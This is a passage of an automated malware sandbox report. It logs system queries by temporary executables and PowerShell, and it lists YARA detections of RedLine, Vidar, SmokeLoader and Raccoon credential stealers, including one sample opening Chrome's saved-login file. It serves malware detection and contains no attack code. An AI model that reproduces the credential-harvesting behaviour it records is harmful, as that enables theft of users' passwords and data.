Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Queries volume information: C:\Users\user\AppData\Local\Temp\60DF.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_00421CC0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00421CC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0065A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 22_2_6C0065A0

Stealing of Sensitive Information:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.DataSvcUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.SMSvcHost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000000.568099425.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.634272090.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.568948579.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.566418529.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.638081498.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 15.1.8908.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.8908.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.8908.exe.2b615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.y8WngeDn4q.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.4EDC.exe.3080e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.esdfufc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.y8WngeDn4q.exe.47615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.y8WngeDn4q.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.1.esdfufc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.3.4EDC.exe.3090000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.4EDC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.esdfufc.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.412091703.0000000002091000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.482521678.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.558722900.00000000048B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.394109827.0000000002801000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.530637179.0000000004B61000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.529516403.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.411806433.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.511213614.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.482408758.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.559098642.00000000049E1000.00000004.00020000.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000002.649599129.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.553896826.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: E4D7.exe PID: 6552, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Yara detected Credential Stealer
Source: Yara match File source: 29.3.E4D7.exe.2db7106.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000003.600140112.0000000002D7E000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.DataSvcUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.SMSvcHost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.DataSvcUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000000.568099425.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.634272090.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.568948579.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.566418529.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.638081498.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 15.1.8908.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.8908.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.8908.exe.2b615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.y8WngeDn4q.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.4EDC.exe.3080e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.esdfufc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.y8WngeDn4q.exe.47615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.y8WngeDn4q.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.1.esdfufc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.3.4EDC.exe.3090000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.4EDC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.esdfufc.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.412091703.0000000002091000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.482521678.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.558722900.00000000048B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.394109827.0000000002801000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.530637179.0000000004B61000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.529516403.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.411806433.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.511213614.0000000003090000.00000004.00000001.sdmp, type: MEMORY
